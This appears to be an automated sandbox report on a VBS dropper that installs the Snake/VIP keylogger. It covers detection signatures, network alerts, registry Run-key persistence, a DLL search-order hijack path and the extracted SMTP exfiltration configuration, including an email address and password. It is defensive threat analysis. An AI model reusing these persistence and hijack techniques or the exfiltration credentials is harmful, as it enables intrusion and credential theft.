6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
Click to see the 266 entries

Sigma Signatures

System Summary

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Source: File created

Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fptrsiaN.pif, NewProcessName: C:\Users\Public\Libraries\fptrsiaN.pif, OriginalFileName: C:\Users\Public\Libraries\fptrsiaN.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5496, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, ProcessId: 5316, ProcessName: fptrsiaN.pif

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Naisrtpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naisrtpf

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\fptrsiaN.pif, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine|base64offset|contains: v, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", ProcessId: 8, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Naisrtpf.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 5496, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Naisrtpf

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\fptrsiaN.pif, NewProcessName: C:\Users\Public\Libraries\fptrsiaN.pif, OriginalFileName: C:\Users\Public\Libraries\fptrsiaN.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 5496, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\fptrsiaN.pif, ProcessId: 5316, ProcessName: fptrsiaN.pif

Sigma detected: Potentially Suspicious Rundll32 Activity

Source: Process started

Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine|base64offset|contains: , Image: C:\Users\Public\ndpha.pif, NewProcessName: C:\Users\Public\ndpha.pif, OriginalFileName: C:\Users\Public\ndpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6120, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , ProcessId: 4428, ProcessName: ndpha.pif

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\fptrsiaN.pif, Initiated: true, ProcessId: 5316, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", CommandLine|base64offset|contains: v, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs", ProcessId: 8, ProcessName: wscript.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T20:06:26.839865+0100	2803305	3	Unknown Traffic	192.168.2.4	49733	104.21.32.1	443	TCP
2025-02-18T20:06:29.803226+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	104.21.32.1	443	TCP
2025-02-18T20:06:33.801818+0100	2803305	3	Unknown Traffic	192.168.2.4	49741	104.21.32.1	443	TCP
2025-02-18T20:06:35.373471+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	104.21.32.1	443	TCP
2025-02-18T20:06:36.939567+0100	2803305	3	Unknown Traffic	192.168.2.4	49747	104.21.32.1	443	TCP
2025-02-18T20:06:39.101639+0100	2803305	3	Unknown Traffic	192.168.2.4	49754	104.21.32.1	443	TCP
2025-02-18T20:06:40.554344+0100	2803305	3	Unknown Traffic	192.168.2.4	49759	104.21.32.1	443	TCP
2025-02-18T20:06:45.541670+0100	2803305	3	Unknown Traffic	192.168.2.4	49766	104.21.32.1	443	TCP
2025-02-18T20:06:46.733091+0100	2803305	3	Unknown Traffic	192.168.2.4	49769	104.21.32.1	443	TCP
2025-02-18T20:06:46.969866+0100	2803305	3	Unknown Traffic	192.168.2.4	49770	104.21.32.1	443	TCP
2025-02-18T20:06:50.065969+0100	2803305	3	Unknown Traffic	192.168.2.4	49779	104.21.32.1	443	TCP
2025-02-18T20:06:51.482947+0100	2803305	3	Unknown Traffic	192.168.2.4	49782	104.21.32.1	443	TCP
2025-02-18T20:06:51.636820+0100	2803305	3	Unknown Traffic	192.168.2.4	49783	104.21.32.1	443	TCP
2025-02-18T20:06:53.067473+0100	2803305	3	Unknown Traffic	192.168.2.4	49786	104.21.32.1	443	TCP
2025-02-18T20:06:57.081927+0100	2803305	3	Unknown Traffic	192.168.2.4	49791	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T20:06:24.533722+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	132.226.8.169	80	TCP
2025-02-18T20:06:26.191560+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49731	132.226.8.169	80	TCP
2025-02-18T20:06:27.707772+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49734	132.226.8.169	80	TCP
2025-02-18T20:06:36.954549+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49746	132.226.8.169	80	TCP
2025-02-18T20:06:38.612982+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49746	132.226.8.169	80	TCP
2025-02-18T20:06:39.982441+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49757	132.226.8.169	80	TCP
2025-02-18T20:06:42.968110+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49760	132.226.8.169	80	TCP
2025-02-18T20:06:43.421961+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49761	132.226.8.169	80	TCP
2025-02-18T20:06:45.125072+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49761	132.226.8.169	80	TCP
2025-02-18T20:06:46.354138+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49768	132.226.8.169	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T20:06:39.624443+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49756	149.154.167.220	443	TCP
2025-02-18T20:06:52.400498+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49784	149.154.167.220	443	TCP
2025-02-18T20:06:58.189821+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49792	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Draft doc PI ITS15235.vbs

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Avira: detection malicious, Label: HEUR/AGEN.1326111
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: HEUR/AGEN.1326111

Found malware configuration

Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587"}
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Naisrtpf.PIF	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 75%
Source: C:\Windows \SysWOW64\NETUTILS.dll	ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

Source: Draft doc PI ITS15235.vbs	Virustotal: Detection: 49%			Perma Link
Source: Draft doc PI ITS15235.vbs	ReversingLabs: Detection: 40%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor: info@irco.com.sa
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor: info12A
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor: mail.irco.com.sa
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor: logs202323@yandex.com
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor: 587
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 6.2.fptrsiaN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 10.2.fptrsiaN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Unpacked PE file: 15.2.fptrsiaN.pif.400000.0.unpack

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49764 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2

Source:	Binary string: easinvoker.pdb source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
Source:	Binary string: _.pdb source: fptrsiaN.pif, 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000003.1748492146.000000001B344000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1870177247.0000000020025000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
Source:	Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000008.00000000.1748336244.0000000000151000.00000020.00000001.01000000.0000000C.sdmp, ndpha.pif.7.dr
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1703545154.000000007EFE3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.0000000020809000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1703545154.000000007EFD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1702681878.000000007F010000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000984000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1715222106.0000000000955000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1751929327.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029C534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

1_2_029C534C

Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	6_2_1B497AC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	6_2_1B494C9C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	6_2_1CF7DB68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2008F2B5h	6_2_2008F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2008FC3Fh	6_2_2008F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2008E0C5h	6_2_2008E114
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_2008E5E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_2008EC1B
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_2008EDFB
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2008E0C5h	6_2_2008DF07
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114B841h	6_2_2114B598
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21141868h	6_2_21141448
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211410F1h	6_2_21140E40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114E3B1h	6_2_2114E108
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114E809h	6_2_2114E560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114EC61h	6_2_2114E9B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114BC99h	6_2_2114B9F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114D6A9h	6_2_2114D400
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21141868h	6_2_21141439
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114DB01h	6_2_2114D858
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114DF59h	6_2_2114DCB0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114FDC1h	6_2_2114FB18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114CDF9h	6_2_2114CB50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21141868h	6_2_21141796
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114D251h	6_2_2114CFA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114F0B9h	6_2_2114EE10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114C0F1h	6_2_2114BE48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114F511h	6_2_2114F268
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114C549h	6_2_2114C2A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114F969h	6_2_2114F6C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2114C9A1h	6_2_2114C6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115BC76h	6_2_2115B9A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211568FDh	6_2_211565C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21157DC0h	6_2_21157AF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21155FB9h	6_2_21155D10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21153BC1h	6_2_21153918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115B7E6h	6_2_2115B518
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115D7D6h	6_2_2115D508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115CA26h	6_2_2115C758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21150FF1h	6_2_21150D48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115EA16h	6_2_2115E748
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21154019h	6_2_21153D70
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115701Ah	6_2_21156F70
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115701Ah	6_2_21156F69
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115AA36h	6_2_2115A768
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21156411h	6_2_21156168
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115DC66h	6_2_2115D998
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115FC56h	6_2_2115F988
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21151449h	6_2_211511A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov esp, ebp	6_2_21159BAA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115EEA6h	6_2_2115EBD8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21154471h	6_2_211541C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115AEC6h	6_2_2115ABF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211518A1h	6_2_211515F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115CEB6h	6_2_2115CBE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115C106h	6_2_2115BE38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211548C9h	6_2_21154620
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115E0F6h	6_2_2115DE28
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21151CF9h	6_2_21151A50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211502E9h	6_2_21150040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115D346h	6_2_2115D078
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21154D21h	6_2_21154A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21155709h	6_2_21155460
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21153311h	6_2_21153068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115F336h	6_2_2115F068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21150741h	6_2_21150498
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115B356h	6_2_2115B088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115E586h	6_2_2115E2B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21155B61h	6_2_211558B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21152151h	6_2_21151EA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115517Bh	6_2_21154ED0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115A5A6h	6_2_2115A2D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21153769h	6_2_211534C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115C596h	6_2_2115C2C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21150B99h	6_2_211508F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 2115F7C6h	6_2_2115F4F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C5730h	6_2_211C5438
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C9090h	6_2_211C8D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C2BE6h	6_2_211C2918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CDD10h	6_2_211CDA18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CB208h	6_2_211CAF10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C4BD6h	6_2_211C4908
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C8700h	6_2_211C8408
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C5BF8h	6_2_211C5900
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CF4F9h	6_2_211CF200
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C3506h	6_2_211C3238
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CF030h	6_2_211CED38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CC528h	6_2_211CC230
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C9A20h	6_2_211C9728
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C6F18h	6_2_211C6C20
